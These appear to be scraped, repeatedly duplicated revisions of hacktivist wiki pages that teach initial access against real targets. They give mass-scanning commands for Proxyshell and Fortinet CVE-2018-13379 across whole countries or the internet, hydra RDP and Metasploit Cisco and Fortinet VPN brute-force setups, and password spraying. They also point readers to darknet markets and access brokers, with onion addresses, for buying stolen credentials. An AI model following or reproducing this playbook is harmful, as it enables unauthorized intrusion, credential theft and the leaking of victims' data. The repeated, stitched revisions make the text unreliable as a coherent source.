* (Book) Black Hat GraphQL: Attacking Next Generation APIs
* API Whitepapers and reports: https://salt.security/resources
* (Book) Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities (Chapter 24 - API Hacking)
* SCORCHED EARTH: [https://web.archive.org/web/20230713230449if_/https://cdn-153.anonfiles.com/a5Q8c02azf/b80f3b8b-1689290042/Scorched-Earth-Whitepaper.pdf HACKING BANKS AND CRYPTOCURRENCY EXCHANGES THROUGH THEIR APIS]
* Exploiting GraphQL: https://blog.assetnote.io/2021/08/29/exploiting-graphql
* HackTricks - GraphQL: https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/graphql

== Testing environments ==
* Completely ridiculous API (crAPI) - Purposefully vulnerable API: https://github.com/OWASP/crAPI
* Damn Vulnerable GraphQL Application - Intentionally vulnerable GraphQL API: https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application
* OWASP Juice Shop - Insecure web application (uses Rest APIs): https://github.com/juice-shop/juice-shop
* The Pixi module is a MEAN Stack web app with wildly insecure APIs!: https://github.com/DevSlop/Pixi
* Vulnerable REST API with OWASP top 10 vulnerabilities for security testing: https://github.com/erev0s/VAmPI

=== Labs ===
* HackTheBox (HTB) Academy: [https://academy.hackthebox.com/course/preview/web-service--api-attacks Web Service & API Attacks] [Paid]
* TryHackMe (THM): [https://tryhackme.com/room/owaspapisecuritytop105w OWASP API Security Top 10 - 1] [Paid]
** TryHackMe (THM): [https://tryhackme.com/room/owaspapisecuritytop10d0 OWASP API Security Top 10 - 2] [Paid]

== Tools ==
* A collection of API Security tools and resources: https://github.com/arainho/awesome-api-security
* A comprehensive API hacking framework (A-Z)! MindAPI: https://dsopas.github.io/MindAPI/play
* Decode JSON Web Tokens (Online): https://jwt.io
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/JSON%20Web%20Token JWT - JSON Web Token]
* A toolkit for testing, tweaking and cracking JSON Web Tokens: https://github.com/ticarpi/jwt_tool
* Obtain GraphQL API schema even if the introspection is disabled: https://github.com/nikitastupin/clairvoyance
* HTTP parameter discovery suite: https://github.com/s0md3v/Arjun
* NSE Script for GraphQL Introspection Check: https://github.com/dolevf/nmap-graphql-introspection-nse
* graphw00f is GraphQL Server Engine Fingerprinting utility: https://github.com/dolevf/graphw00f
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/GraphQL%20Injection GraphQL Injection]
* GraphQL Introspection analyzer: https://github.com/gwen001/graphql-introspection-analyzer
* If you have found API keys perhaps in a JavaScript file but are not sure how to test their validity use keyhacks:https://github.com/streaak/keyhacks

=== Intercepting proxies ===
These let you view, edit, and replay requests, and are extremely useful for finding vulnerabilities in web applications, mobile and APIs.
* https://www.postman.com (API focused)
* https://portswigger.net/burp (If a WAF is blocking Burpsuite then [https://stackoverflow.com/questions/70129432/how-to-bypass-cloudflare-protection-with-burp try editing your user-agent string])
* https://www.zaproxy.org | [https://www.zaproxy.org/blog/2020-08-28-introducing-the-graphql-add-on-for-zap GraphQL Add-on for ZAP] to exploit GraphQL Introspection.

=== Fuzzing ===
* https://github.com/assetnote/kiterunner (API focused)
* https://github.com/ffuf/ffuf
* https://www.kali.org/tools/wfuzz

==== Wordlists ====
[https://github.com/assetnote/kiterunner Kiterunner] word lists:
# https://wordlists-cdn.assetnote.io/rawdata/kiterunner/routes-large.json.tar.gz
# https://wordlists-cdn.assetnote.io/data/kiterunner/routes-large.kite.tar.gz
# https://wordlists-cdn.assetnote.io/rawdata/kiterunner/routes-small.json.tar.gz
# https://wordlists-cdn.assetnote.io/data/kiterunner/routes-small.kite.tar.gz
# https://wordlists-cdn.assetnote.io/rawdata/kiterunner/swagger-files.tar
# https://wordlists-cdn.assetnote.io/data/kiterunner/swagger-wordlist.txt
Web API specific word lists:
* A list of 3203 common API endpoints and objects designed for fuzzing: https://gist.github.com/yassineaboukir/8e12adefbd505ef704674ad6ad48743d
* A wordlist of API names for web application assessments: https://github.com/chrislockard/api_wordlist
* A collection of API word lists: https://github.com/hAPI-hacker/Hacking-APIs
* GraphQL word list: https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/graphql.txt

== Exploitation ==
Although API specific exploitation may require scripting or custom payloads to mass scrape data or exploit logic based vulnerabilities it's still worth knowing common payloads and exploit tools for web applications: https://enlacehacktivista.org/index.php?title=Exploitation

Initial Access Tactics, techniques and procedures

2024-03-30T12:22:23Z

Booda: /* Buying access */

== Phishing ==
[https://www.frontiersin.org/articles/10.3389/fcomp.2021.563060/full Phishing] is the most common attack method favored by advanced persistent threat groups and cyber criminal organized gangs. This is because it relies on social engineering to trick the target to either download a malicious e-mail attachment or click on a malicious link.

==== Tools ====
* https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html
* https://medium.com/maltrak/com-objects-p-2-your-stealthy-fileless-attack-bf78318d9165
* https://infosecwriteups.com/recipe-for-a-successful-phishing-campaign-part-1-2-dc23d927ec55
* https://www.xanthus.io/mastering-the-simulated-phishing-attack
* https://github.com/Arno0x/EmbedInHTML
* https://github.com/L4bF0x/PhishingPretexts
* http://lockboxx.blogspot.com/2018/12/gophish-evilginx2-for-phishing.html
* https://book.hacktricks.xyz/phishing-methodology
* https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective
* https://delta.navisec.io/a-pentesters-guide-part-4-grabbing-hashes-and-forging-external-footholds/
* https://www.rootshellsecurity.net/ntlm_theft-a-tool-for-file-based-forced-ntlm-hash-disclosure/
* https://getgophish.com/ Be sure to [https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls remove the identifying headers gophish adds]
* https://github.com/curtbraz/PhishAPI
* https://github.com/edoverflow/can-i-take-over-xyz
* https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-external-engagement-through-spear-phishing/
* Phishing with GoPhish and DigitalOcean: https://www.ired.team/offensive-security/initial-access/phishing-with-gophish-and-digitalocean | [https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls remove the identifying headers gophish adds]
* Phishing with MS Office: https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office

== Password Attacks ==
Groups like [https://www.microsoft.com/en-us/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/ Lapsus$] show's the world that you don't need to be a great technical hacker to pwn massive corporations and if common password and multi-factor authentication (MFA) attacks work on the likes of [https://en.wikipedia.org/wiki/Lapsus$ Uber, Rockstar games, Okta and so on] then they will work on our hacktivist targets!

If your target uses multi-factor authentication you can try either [https://www.forbes.com/sites/daveywinder/2022/09/18/has-uber-been-hacked-company-investigates-cybersecurity-incident-as-law-enforcement-alerted social engineering] or MFA fatigue.

=== Usernames ===
Create a bespoke username word list based on OSINT, recon, permutations and your targets employee LinkedIn, website and other social media profiles to aid in your password attacks to develop possible usernames and e-mails for password spraying.

* https://github.com/digininja/CeWL
* https://github.com/Mebus/cupp
* https://github.com/digininja/RSMangler
* https://github.com/sc0tfree/mentalist
* https://github.com/urbanadventurer/username-anarchy
* https://github.com/vysecurity/LinkedInt
* https://github.com/initstring/linkedin2username
* https://github.com/shroudri/username_generator

=== Passwords ===
Common and leaked credentials to test login portals and network services.

==== Default passwords ====
* https://cirt.net/passwords
* https://default-password.info
* https://datarecovery.com/rd/default-passwords
* https://github.com/ihebski/DefaultCreds-cheat-sheet

==== Common and leaked passwords ====
* https://wiki.skullsecurity.org/index.php?title=Passwords
* https://github.com/danielmiessler/SecLists/tree/master/Passwords
* https://github.com/danielmiessler/SecLists/tree/master/Passwords/Leaked-Databases
* https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
* https://github.com/projectdiscovery/nuclei-templates/tree/main/helpers/wordlists

=== Password cracking tools ===

* https://github.com/byt3bl33d3r/SprayingToolkit
* https://www.kali.org/tools/hydra
* https://www.kali.org/tools/brutespray
* https://www.kali.org/tools/medusa
* https://www.kali.org/tools/patator
* https://github.com/1N3/BruteX

=== Searching leaks ===
* https://github.com/khast3x/h8mail [Free but includes paid services]

==== Services ====
'''Please note: DO NOT use intelx[.]io as they [https://web.archive.org/web/20230319045845/https://twitter.com/_IntelligenceX/status/1610302930069889024 have been seen doxing hackers] in the past and [https://web.archive.org/web/20230323031901/https://blog.intelx.io/2020/07/05/why-we-are-going-to-block-tor-ips block the use of Tor]. AVOID!'''

You can use services that compile COMBO lists (leaked credentials) to search for your targets domain, then download the results and use them in a password attack to see whether or not your target recycles their credentials.

* https://haveibeenpwned.com
* https://exposed.lol
* https://leak-lookup.com [Paid. Accepts crypto (XMR & BTC)]
* https://dehashed.com [Paid. Accepts crypto (BTC)]

Once your leaks have been downloaded you can [https://archive.ph/C8tI2 parse] your results in the format, e-mail:pass.

=== Password spraying ===
Employees commonly use recycled and weak credentials for convenience. If you already have valid passwords you can try and spray them across different services to test whether they have been recycled on other services or not. You can also take common passwords [https://github.com/danielmiessler/SecLists/blob/master/Passwords/common_corporate_passwords.lst (Spring2023)] and spray them hoping an employee uses a weak and guessable credential.

* https://github.com/dafthack/MSOLSpray
* https://pentestlab.blog/2019/09/05/microsoft-exchange-password-spraying
* https://github.com/blacklanternsecurity/TREVORspray
* https://github.com/knavesec/CredMaster
* https://github.com/xFreed0m/RDPassSpray
* https://github.com/dafthack/MailSniper

=== Hash cracking ===
[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md Crack password hashes] using both online and offline tools!

==== Identify hash ====
* https://github.com/blackploit/hash-identifier

==== Online tools ====
* https://hashes.com/en/decrypt/hash [Free & Paid]
* https://crackstation.net

==== Offline tools ====
* https://github.com/hashcat/hashcat
* https://github.com/openwall/john
* https://github.com/NotSoSecure/password_cracking_rules

== Buying access ==

You can use the russian market to purchase credentials stolen from targets through the use of info stealer malware. Search your target here to see if you can make a quick win gaining access to an employee account. Any account that allows internal access is always a great start.
* http://flydedxmmddhgt3vfhv6om63ra2u2x4jxginulhxb6nzcnj3wwgavwyd.onion [Paid]

You can also find access brokers selling network access inside of companies on forums. Services include but is not limited to account credentials, shells, implants, and other remote management software (RDP, VPN, SSH, etc).

* https://xss.is ([http://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion Tor])
* https://exploit.in [Paid] ([https://exploitivzcm5dawzhe6c32bbylyggbjvh5dyvsvb5lkuz5ptmunkmqd.onion Tor])
* https://ramp4u.io [Free & Paid] ([http://rampjcdlqvgkoz5oywutpo6ggl7g6tvddysustfl6qzhr5osr24xxqqd.onion Tor])

== Spray and pray ==
As seen by [https://enlacehacktivista.org/hackback2.webm Guacamaya], hacktivists can benefit from a highly targeted spray and pray campaign whereby you scan IP ranges of countries of interest or your target companies IP ranges for critical vulnerabilities and attack protocols with a password attack. In the case of Guacamaya they scanned and exploited proxyshell and yoinked all their target e-mails out of their Microsoft exchange e-mail servers and leaked them. You can also do the same! See [https://enlacehacktivista.org/index.php?title=Scanning_and_Recon scanning and recon] for tools such as [https://github.com/projectdiscovery/nuclei nuclei] and the [https://nmap.org/book/nse.html nmap scripting engine] (NSE) to then vulnerability scan the IP addresses you discover.

=== Prerequisites ===
There are some prerequisites you will need to follow the below examples:
# Virtual or Dedicated server ([https://enlacehacktivista.org/index.php?title=Opsec_Measures OPSEC])
# Basic [https://www.hackthebox.com/blog/learn-linux command line knowledge]
# Terminal multiplexers such as [https://github.com/tmux/tmux/wiki Tmux] or [https://www.gnu.org/software/screen/ Gnu/Screen] to maintain your scanning and hacking session
# Administration skills such as [https://www.redhat.com/sysadmin/eight-ways-secure-ssh SSH] and [https://www.ssh.com/academy/ssh/scp#basic-usage SCP].

=== Networks ===
==== Vulnerability Scanning ====
We can use a vulnerability scanning spray and pray technique on [https://attack.mitre.org/techniques/T1190 publicly facing applications] to masscan the internet or specific IP ranges for critical vulnerabilities that we can later exploit and gain initial access into target networks with. Here we scan for and exploit both Proxyshell and CVE-2018-13379 as they are both high severity and critical CVE vulnerabilities. In your attacks focus on [https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a new] and [https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-117a old] CVE vulnerabilities that are commonly exploited.

Here we port scan IP ranges for either the entire internet or specific country IP ranges, append those ports to the end of the IP address separated with a colon and then proceed to vulnerability scan the discovered hosts before finally exploiting the identified vulnerabilities.

'''IP Ranges''':
* List of IP ranges from popular cloud providers: https://kaeferjaeger.gay/?dir=ip-ranges
* CIDR country-level IP data, straight from the Regional Internet Registries, updated hourly: https://github.com/herrbischoff/country-ip-blocks
* [https://github.com/robertdavidgraham/masscan#how-to-scan-the-entire-internet Scan the entire internet:] 0.0.0.0/0

===== Proxyshell =====
'''Tool''': [https://github.com/robertdavidgraham/masscan masscan]

'''1.''' Scan for [https://www.mandiant.com/resources/blog/pst-want-shell-proxyshell-exploiting-microsoft-exchange-servers Proxyshell]:
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://github.com/herrbischoff/country-ip-blocks ranges.txt] --rate 50000 -p443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt</code>

* <code>sed -i 's/$/:443/' results.txt</code>

*<code>[https://github.com/projectdiscovery/nuclei nuclei] -l results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-34473.yaml nuclei-templates/http/cves/2021/CVE-2021-34473.yaml] -o vulns.txt</code>

Exploit Discovered hosts: [[Proxyshell]]

===== CVE-2018-13379 =====
'''2.''' Scan for [https://www.ic3.gov/Media/News/2021/210402.pdf CVE-2018-13379]:
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://github.com/herrbischoff/country-ip-blocks ranges.txt] --rate 50000 -p4443,10443,8443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] --output-format list --output-file results.txt</code>
* <code>awk '{ print $4 ":" $3 }' results.txt > final_results.txt</code>
* <code>[https://github.com/projectdiscovery/nuclei nuclei] -l final_results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2018/CVE-2018-13379.yaml nuclei-templates/http/cves/2018/CVE-2018-13379.yaml] -o vulns.txt</code>
Exploit Discovered hosts: [[Fortinet SSL VPN Path Traversal]]

'''Tool''': [https://github.com/zmap/zmap zmap]

'''1.''' Scan for Microsoft Exchange E-mail Servers:
<pre>
sudo zmap -q -p 443 | httpx -silent -s -sd -location \
> | awk '/owa/ { print substr($1,9) }' > owa.txt
</pre>
'''2.''' Vulnerability scan discovered hosts for [[Proxyshell]] using [https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange-proxyshell.nse NSE]
<pre>
nmap -p 443 -Pn -n \
> --script http-vuln-exchange-proxyshell.nse -iL owa.txt
</pre>

[https://enlacehacktivista.org/hackback2.webm Exploit Discovered hosts]

===== Domains =====
Mass subdomain enumerating, port scanning and vulnerability scanning domains at the start of an operation when targeting a country or specific TLDs (.gov) is a great way to get a lot of coverage and find low hanging fruit vulnerabilities which may serve as the initial access vector when hacking your targets.

See [[Domain Spray and Pray]] scanning.

==== Password Attacks ====
A lot of organizations use VPNs and RDPs to allow employees and third-party contractors to remotely connect into the internal network of the organization. For either developer, testing, lazy administration or forgotten about servers these systems can be left running with weak or default credentials with no multi-factor authentication in place. Port scan the internet for ports they commonly run on, cross referencing against Shodan for standard and non-standard ports then use common and default credentials.

===== RDP =====
'''1.''' [https://github.com/galkan/crowbar Remote Desktop (RDP) Brute forcing]:
 
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://enlacehacktivista.org/images/4/4b/Latin_american_ranges.txt ranges.txt] --rate 50000 -p3389 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt</code>
* <code>[https://github.com/vanhauser-thc/thc-hydra hydra] -L [https://github.com/danielmiessler/SecLists/tree/master/Usernames usernames.txt] -P [https://github.com/danielmiessler/SecLists/tree/master/Passwords passwords.txt] -M targets.txt -t 16 rdp -o results</code>

===== VPN =====
'''2.''' Virtual Private Network (VPN) Brute forcing:
 
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://enlacehacktivista.org/images/4/4b/Latin_american_ranges.txt ranges.txt] --rate 50000 -p10443,443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt</code>
* To brute-force see: https://enlacehacktivista.org/index.php?title=VPN_brute_forcing

VPN brute forcing

2024-03-30T12:19:50Z

Booda:

[https://www.rapid7.com/blog/post/2023/08/29/under-siege-rapid7-observed-exploitation-of-cisco-asa-ssl-vpns Brute force common corporate VPNs] to gain initial access to target networks. [https://enlacehacktivista.org/index.php?title=Exploitation#Metasploit Install metasploit] and then see [https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures#Spray_and_pray Initial access TTPs for mass port scanning]. For this to work properly using a large username and password file will cause the module to stall for a very long time. To fix this issue use [https://github.com/projectdiscovery/nuclei-templates/blob/main/helpers/wordlists/wp-users.txt smaller user] and [https://github.com/projectdiscovery/nuclei-templates/blob/main/helpers/wordlists/wp-passwords.txt password] files.

Word lists:
* https://enlacehacktivista.org/index.php/Initial_Access_Tactics,_techniques_and_procedures#Common_and_leaked_passwords

== CISCO ==
<pre>
sudo systemctl start postgresql
msfdb init

msfconsole
use auxiliary/scanner/http/cisco_ssl_vpn
set RHOSTS file:/home/targets_443.txt
set RPORT 443
set USER_FILE /home/users.txt
set PASS_FILE /home/pass.txt
set threads 10
run
</pre>

== FORTI SSL VPN ==
<pre>
sudo systemctl start postgresql
msfdb init

msfconsole
use auxiliary/scanner/http/fortinet_ssl_vpn
set RHOSTS file:/home/targets_10443.txt
set RPORT 10443
set USER_FILE /home/users.txt
set PASS_FILE /home/pass.txt
set threads 10
run
</pre>

Initial Access Tactics, techniques and procedures

2024-03-30T12:19:36Z

Booda: /* Common and leaked passwords */

== Phishing ==
[https://www.frontiersin.org/articles/10.3389/fcomp.2021.563060/full Phishing] is the most common attack method favored by advanced persistent threat groups and cyber criminal organized gangs. This is because it relies on social engineering to trick the target to either download a malicious e-mail attachment or click on a malicious link.

==== Tools ====
* https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html
* https://medium.com/maltrak/com-objects-p-2-your-stealthy-fileless-attack-bf78318d9165
* https://infosecwriteups.com/recipe-for-a-successful-phishing-campaign-part-1-2-dc23d927ec55
* https://www.xanthus.io/mastering-the-simulated-phishing-attack
* https://github.com/Arno0x/EmbedInHTML
* https://github.com/L4bF0x/PhishingPretexts
* http://lockboxx.blogspot.com/2018/12/gophish-evilginx2-for-phishing.html
* https://book.hacktricks.xyz/phishing-methodology
* https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective
* https://delta.navisec.io/a-pentesters-guide-part-4-grabbing-hashes-and-forging-external-footholds/
* https://www.rootshellsecurity.net/ntlm_theft-a-tool-for-file-based-forced-ntlm-hash-disclosure/
* https://getgophish.com/ Be sure to [https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls remove the identifying headers gophish adds]
* https://github.com/curtbraz/PhishAPI
* https://github.com/edoverflow/can-i-take-over-xyz
* https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-external-engagement-through-spear-phishing/
* Phishing with GoPhish and DigitalOcean: https://www.ired.team/offensive-security/initial-access/phishing-with-gophish-and-digitalocean | [https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls remove the identifying headers gophish adds]
* Phishing with MS Office: https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office

== Password Attacks ==
Groups like [https://www.microsoft.com/en-us/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/ Lapsus$] show's the world that you don't need to be a great technical hacker to pwn massive corporations and if common password and multi-factor authentication (MFA) attacks work on the likes of [https://en.wikipedia.org/wiki/Lapsus$ Uber, Rockstar games, Okta and so on] then they will work on our hacktivist targets!

If your target uses multi-factor authentication you can try either [https://www.forbes.com/sites/daveywinder/2022/09/18/has-uber-been-hacked-company-investigates-cybersecurity-incident-as-law-enforcement-alerted social engineering] or MFA fatigue.

=== Usernames ===
Create a bespoke username word list based on OSINT, recon, permutations and your targets employee LinkedIn, website and other social media profiles to aid in your password attacks to develop possible usernames and e-mails for password spraying.

* https://github.com/digininja/CeWL
* https://github.com/Mebus/cupp
* https://github.com/digininja/RSMangler
* https://github.com/sc0tfree/mentalist
* https://github.com/urbanadventurer/username-anarchy
* https://github.com/vysecurity/LinkedInt
* https://github.com/initstring/linkedin2username
* https://github.com/shroudri/username_generator

=== Passwords ===
Common and leaked credentials to test login portals and network services.

==== Default passwords ====
* https://cirt.net/passwords
* https://default-password.info
* https://datarecovery.com/rd/default-passwords
* https://github.com/ihebski/DefaultCreds-cheat-sheet

==== Common and leaked passwords ====
* https://wiki.skullsecurity.org/index.php?title=Passwords
* https://github.com/danielmiessler/SecLists/tree/master/Passwords
* https://github.com/danielmiessler/SecLists/tree/master/Passwords/Leaked-Databases
* https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
* https://github.com/projectdiscovery/nuclei-templates/tree/main/helpers/wordlists

=== Password cracking tools ===

* https://github.com/byt3bl33d3r/SprayingToolkit
* https://www.kali.org/tools/hydra
* https://www.kali.org/tools/brutespray
* https://www.kali.org/tools/medusa
* https://www.kali.org/tools/patator
* https://github.com/1N3/BruteX

=== Searching leaks ===
* https://github.com/khast3x/h8mail [Free but includes paid services]

==== Services ====
'''Please note: DO NOT use intelx[.]io as they [https://web.archive.org/web/20230319045845/https://twitter.com/_IntelligenceX/status/1610302930069889024 have been seen doxing hackers] in the past and [https://web.archive.org/web/20230323031901/https://blog.intelx.io/2020/07/05/why-we-are-going-to-block-tor-ips block the use of Tor]. AVOID!'''

You can use services that compile COMBO lists (leaked credentials) to search for your targets domain, then download the results and use them in a password attack to see whether or not your target recycles their credentials.

* https://haveibeenpwned.com
* https://exposed.lol
* https://leak-lookup.com [Paid. Accepts crypto (XMR & BTC)]
* https://dehashed.com [Paid. Accepts crypto (BTC)]

Once your leaks have been downloaded you can [https://archive.ph/C8tI2 parse] your results in the format, e-mail:pass.

=== Password spraying ===
Employees commonly use recycled and weak credentials for convenience. If you already have valid passwords you can try and spray them across different services to test whether they have been recycled on other services or not. You can also take common passwords [https://github.com/danielmiessler/SecLists/blob/master/Passwords/common_corporate_passwords.lst (Spring2023)] and spray them hoping an employee uses a weak and guessable credential.

* https://github.com/dafthack/MSOLSpray
* https://pentestlab.blog/2019/09/05/microsoft-exchange-password-spraying
* https://github.com/blacklanternsecurity/TREVORspray
* https://github.com/knavesec/CredMaster
* https://github.com/xFreed0m/RDPassSpray
* https://github.com/dafthack/MailSniper

=== Hash cracking ===
[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md Crack password hashes] using both online and offline tools!

==== Identify hash ====
* https://github.com/blackploit/hash-identifier

==== Online tools ====
* https://hashes.com/en/decrypt/hash [Free & Paid]
* https://crackstation.net

==== Offline tools ====
* https://github.com/hashcat/hashcat
* https://github.com/openwall/john
* https://github.com/NotSoSecure/password_cracking_rules

== Buying access ==

You can use the russian market to purchase credentials stolen from targets through the use of info stealer malware. Search your target here to see if you can make a quick win gaining access to an employee account. Any account that allows internal access is always a great start.
* http://flydedxmmddhgt3vfhv6om63ra2u2x4jxginulhxb6nzcnj3wwgavwyd.onion [Paid]

You can also find access brokers selling network access inside of companies on forums. Services include but is not limited to account credentials, shells, implants, and other remote management software (RDP, VPN, SSH, etc).

* https://xss.is ([http://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion Tor])
* https://exploit.in [Paid] ([https://exploitivzcm5dawzhe6c32bbylyggbjvh5dyvsvb5lkuz5ptmunkmqd.onion Tor])

== Spray and pray ==
As seen by [https://enlacehacktivista.org/hackback2.webm Guacamaya], hacktivists can benefit from a highly targeted spray and pray campaign whereby you scan IP ranges of countries of interest or your target companies IP ranges for critical vulnerabilities and attack protocols with a password attack. In the case of Guacamaya they scanned and exploited proxyshell and yoinked all their target e-mails out of their Microsoft exchange e-mail servers and leaked them. You can also do the same! See [https://enlacehacktivista.org/index.php?title=Scanning_and_Recon scanning and recon] for tools such as [https://github.com/projectdiscovery/nuclei nuclei] and the [https://nmap.org/book/nse.html nmap scripting engine] (NSE) to then vulnerability scan the IP addresses you discover.

=== Prerequisites ===
There are some prerequisites you will need to follow the below examples:
# Virtual or Dedicated server ([https://enlacehacktivista.org/index.php?title=Opsec_Measures OPSEC])
# Basic [https://www.hackthebox.com/blog/learn-linux command line knowledge]
# Terminal multiplexers such as [https://github.com/tmux/tmux/wiki Tmux] or [https://www.gnu.org/software/screen/ Gnu/Screen] to maintain your scanning and hacking session
# Administration skills such as [https://www.redhat.com/sysadmin/eight-ways-secure-ssh SSH] and [https://www.ssh.com/academy/ssh/scp#basic-usage SCP].

=== Networks ===
==== Vulnerability Scanning ====
We can use a vulnerability scanning spray and pray technique on [https://attack.mitre.org/techniques/T1190 publicly facing applications] to masscan the internet or specific IP ranges for critical vulnerabilities that we can later exploit and gain initial access into target networks with. Here we scan for and exploit both Proxyshell and CVE-2018-13379 as they are both high severity and critical CVE vulnerabilities. In your attacks focus on [https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a new] and [https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-117a old] CVE vulnerabilities that are commonly exploited.

Here we port scan IP ranges for either the entire internet or specific country IP ranges, append those ports to the end of the IP address separated with a colon and then proceed to vulnerability scan the discovered hosts before finally exploiting the identified vulnerabilities.

'''IP Ranges''':
* List of IP ranges from popular cloud providers: https://kaeferjaeger.gay/?dir=ip-ranges
* CIDR country-level IP data, straight from the Regional Internet Registries, updated hourly: https://github.com/herrbischoff/country-ip-blocks
* [https://github.com/robertdavidgraham/masscan#how-to-scan-the-entire-internet Scan the entire internet:] 0.0.0.0/0

===== Proxyshell =====
'''Tool''': [https://github.com/robertdavidgraham/masscan masscan]

'''1.''' Scan for [https://www.mandiant.com/resources/blog/pst-want-shell-proxyshell-exploiting-microsoft-exchange-servers Proxyshell]:
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://github.com/herrbischoff/country-ip-blocks ranges.txt] --rate 50000 -p443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt</code>

* <code>sed -i 's/$/:443/' results.txt</code>

*<code>[https://github.com/projectdiscovery/nuclei nuclei] -l results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-34473.yaml nuclei-templates/http/cves/2021/CVE-2021-34473.yaml] -o vulns.txt</code>

Exploit Discovered hosts: [[Proxyshell]]

===== CVE-2018-13379 =====
'''2.''' Scan for [https://www.ic3.gov/Media/News/2021/210402.pdf CVE-2018-13379]:
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://github.com/herrbischoff/country-ip-blocks ranges.txt] --rate 50000 -p4443,10443,8443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] --output-format list --output-file results.txt</code>
* <code>awk '{ print $4 ":" $3 }' results.txt > final_results.txt</code>
* <code>[https://github.com/projectdiscovery/nuclei nuclei] -l final_results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2018/CVE-2018-13379.yaml nuclei-templates/http/cves/2018/CVE-2018-13379.yaml] -o vulns.txt</code>
Exploit Discovered hosts: [[Fortinet SSL VPN Path Traversal]]

'''Tool''': [https://github.com/zmap/zmap zmap]

'''1.''' Scan for Microsoft Exchange E-mail Servers:
<pre>
sudo zmap -q -p 443 | httpx -silent -s -sd -location \
> | awk '/owa/ { print substr($1,9) }' > owa.txt
</pre>
'''2.''' Vulnerability scan discovered hosts for [[Proxyshell]] using [https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange-proxyshell.nse NSE]
<pre>
nmap -p 443 -Pn -n \
> --script http-vuln-exchange-proxyshell.nse -iL owa.txt
</pre>

[https://enlacehacktivista.org/hackback2.webm Exploit Discovered hosts]

===== Domains =====
Mass subdomain enumerating, port scanning and vulnerability scanning domains at the start of an operation when targeting a country or specific TLDs (.gov) is a great way to get a lot of coverage and find low hanging fruit vulnerabilities which may serve as the initial access vector when hacking your targets.

See [[Domain Spray and Pray]] scanning.

==== Password Attacks ====
A lot of organizations use VPNs and RDPs to allow employees and third-party contractors to remotely connect into the internal network of the organization. For either developer, testing, lazy administration or forgotten about servers these systems can be left running with weak or default credentials with no multi-factor authentication in place. Port scan the internet for ports they commonly run on, cross referencing against Shodan for standard and non-standard ports then use common and default credentials.

===== RDP =====
'''1.''' [https://github.com/galkan/crowbar Remote Desktop (RDP) Brute forcing]:
 
